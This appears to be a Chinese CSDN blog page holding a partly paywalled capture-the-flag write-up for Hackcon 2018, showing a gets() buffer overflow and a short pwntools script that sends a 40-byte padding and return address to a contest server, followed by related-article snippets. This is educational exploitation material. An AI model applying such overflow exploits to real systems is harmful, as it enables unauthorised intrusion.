Hackcon 2018 两道题的wp

最新推荐文章于 2023-02-21 22:23:48 发布
VIP文章 最新推荐文章于 2023-02-21 22:23:48 发布
阅读量474 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w12315q/article/details/81778086
版权

首先是第一题vuln是一道签到题

看了发现gets函数可以溢出

然后在看看有什么可用的函数发现了一个callmemaybe的函数跳到那个函数就可以了

可以看见溢出跳到这个函数就可以了,具体的溢出点的寻找可以利用gdb-peda里的pattern create 数量

然后输入后pattern offset 地址就可以找到溢出点的偏移量了。

from pwn import *

#p=process('./vuln.dms')
p = remote('139.59.30.165',8700)
#gdb.attach(p,"b main")

payload = 'a'* 40 + p64(0x400766)
p.recvuntil('>>>')
p.sendline(payload)
p.interactive()
 

最低0.47元/天 解锁文章
Peanuts_CTF
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack测试hack 测试 基本防HACK安全技术测试
08-30
hack 测试 基本防HACK安全技术测试
CTF wp 2018“骇极杯”全国大学生网络安全邀请赛暨第四届上海市大学生网络安全大赛线上赛 writeup
Thea_1207的博客
11-05 3747
为0x00 签到操作内容: | 登陆比赛界面上去看到签到,一般情况下签到是没有难度的目给定一串字符MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q Base32 一闪而过,比的就是手速,解码拿到flag。 FLAG 值: 标志{35222d30-439e-4afb-91F4-abebc73fe0...
Baby PHP - hacklu CTF 2018
stepone4ward的博客
07-13 701
代码审计
Hack比赛(2020.02.05【NOIP普及组】模拟赛C组)
蒟蒻こんにゃく
02-06 906
目描述 Codefires round马上就要结束了!ZCC已经通过做得到了C分。但他惊讶地发现,房间里的其他选手也都解决了最难的。ZCC根据经验断定大多数的选手都会FST的!当然,除去rating最高的选手Memset137。在此之前,ZCC想要hack他们来使他的得分更高。除了ZCC,房间里有N个选手,他们已经被按照rating从小到大排序了(所以Memset137是排在第N个的选手)。...
[BUUCTF-pwn] hackcon2018_elegent
weixin_52640415的博客
12-31 630
难度不大,坑点巨多。 全程没几句话,一个明显的printf+溢出 int __cdecl main(int argc, const char **argv, const char **envp) { char format[64]; // [rsp+10h] [rbp-40h] BYREF printf("Hola %s bois\n", "sup"); puts("Give me some inputz: "); fflush(_bss_start); __isoc99_sca
Renesas 两个功率MOSFET的HAT2210WP
01-20
瑞萨科技公司(Renesas)宣布推出具有两个功率MOSFET的HAT2210WP,封装形式是WPAK (瑞萨科技的封装代码)*1高热辐射封装,尺寸仅有5.3 × 6.1 × 0.8 mm (),用于笔记本电脑、通信设备及类似产品的DC-DC变换器中。...
实现两种设置页面源码WP7
04-02
该源码实现了怎样两种设置页面效果源码,也是不错的界面设计的效果特效,喜欢的朋友可以下载看看。 效果介绍: 该例程显示两个设置页面屏幕,其中一个设置页面将立即生效改变设置, 另外一个设置页面将提示用户确认...
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
Wp.rar_wp
09-14
简单实用的butterworth滤波器设计,很好用
XSS注入进阶练习篇(三) XSS原型链污染
好好睡觉
02-21 2330
原型链概念、原型连链污染概念、原型连污染示例
Hack 【二分答案】
weixin_30687587的博客
04-23 131
意:给出n门课程,每一门课程考的分数,每一门课程的学分,求最多删去k组数据之后能够得到的最大加权平均数 先开一个数组x[],其中x[i]=1代表没有删除这门课程,x[i]=0表示删除了这门课程 然后p[i]=R*c[i]-c[i]*s[i]=c[i]*(R-s[i]) 又因为满分为100分,就在0.0在100.0二分来找 再将p数组降序排列,ans为其前n-k个数的和, 如果an...
【Pwn】Rop-Ret2Shellcode-32位
weixin_52553215的博客
05-24 698
ret2text漏洞依赖于程序中存在system(“/bin/sh”)的函数 若没有此函数,可以传入自定义shellcode //shellcode是黑客编写的用于实行特定功能的汇编代码,例如:execve(“/bin/sh”,null,null); Ret2Shellcode条件:1.无执行shell的函数 2.没有开启NX保护 Ret2libc条件:1.开启NX 2.使用li...
HDU 6313 - Hack It [2018杭电多校联赛第二场 E](数论构造)
weixin_30341735的博客
07-27 117
目链接 http://acm.hdu.edu.cn/showproblem.php?pid=6313 【意】 构造一个n*n的矩阵,矩阵元素只有0和1,要求该矩阵的任意一个子矩阵的四个角不能同时为1,同时该矩阵中所有1的个数要大于85000个,没有输入,输出符合要求的n的值和这个矩阵即可. 【思路】 看了大佬讲的构造方法,反正我自己是想不...
2018 Multi-University Training Contest 2 Hack It - HDU 6313
yiyiLy的博客
07-26 217
Hack It Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) Total Submission(s): 747    Accepted Submission(s): 247Special Judge   Problem Description Tonyfang is a ...
UVa1660 (hack全网解祭)
weixin_30329623的博客
04-19 132
UVa 1660 意:给定n点m边的无向图,询问最少删除多少个点,使得原图不连通。n<=50 点上有权值的目可以考虑拆点解决–刘汝佳 原图不连通的充要条件为存在任意点对(S,T)不连通。 因此枚举点对(S,T),求解使其不连通的最小割点数,其中取min即为答案。将各点拆成入点和出点,将割点转化为割边、1条无向边转化为2条有向边,即可将该问转化到最小割模型上。 ...
c++堆栈溢出怎么解决_栈溢出基础
weixin_39610422的博客
11-23 3290
一. 基础知识什么是缓冲区溢出在深入探讨技术之前, 让我们先了解一下缓冲区溢出的实际内容.想象一个非常简单的程序, 要求你输入你的用户名, 然后返回到它在做什么.从视觉上看, 如下所示注意到括号之间的空格是输入用户名的预期空间.那个空间是我们的缓冲.处理用户名后, 返回地址将告知程序需要执行的下一个指令.现在, 如果我们不仅输入用户名, 而且添加其他数据以溢出此缓冲区空间, 会发生什么情况?不仅如...
回文串目的解析以及我的一些错误思考
henuzxy
12-12 919
1650: (D)回文串 Time Limit: 1 Sec  Memory Limit: 128 MB Submit: 480  Solved: 154 SubmitStatusWeb Board Description 回文字符串是:一个字符串正着读和倒着读是一样的序列。例如ABCBA就是一个一个回文串,现在无聊的psq重新定义了一种“回文串”叫对称串,即一个字符串以中点
开始思考
不要让梦想蒙尘!!!对自己狠一点!!!
12-03 97
工作了才发现自己不懂的很多,代码也只是能运行就行,自己也知道很垃圾,呵呵,程序员的第4层境界,加油,严要求自己,打算看下底层,不懂底层的东西就==没有扎实的基本功,基础才王道,处理问的方式,自己的套路这样才可以慢慢成为绝世高手...
2018年美亚杯wp
最新发布
12-23
2018年美亚杯wp(世界杯预选赛)是一场激动人心的比赛。在这次比赛中,来自美洲和亚洲的国家队齐聚一堂,争夺着参加世界杯的资格。比赛分为几个阶段,包括小组赛、淘汰赛和最终决赛。在小组赛阶段,各个国家队都全力以赴,力争取得好成绩晋级下一轮比赛。在淘汰赛中,每场比赛都充满了悬念和紧张,球员们拼尽全力,希望能为自己的国家赢得胜利。最终,两支实力强大的队伍晋级了决赛,并在决赛中展开了激烈的较量。比赛的结果让人激动不已,球员们的精彩表现和无悔拼搏赢得了观众们的尊重和喝彩。这场比赛不仅展现了各国足球实力的竞争,也彰显了团队合作和拼搏精神的重要性。在2018年美亚杯wp上,球员们展现了他们的技术和实力,也为球迷们带来了精彩的比赛。这场比赛的胜利者将代表美洲和亚洲的足球实力,向世界杯冠军发起挑战,而输家也将以更加努力的态度备战下一届比赛。这次比赛的精彩瞬间将会成为历史的记忆,激励着更多的球员和球迷,为梦想努力拼搏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值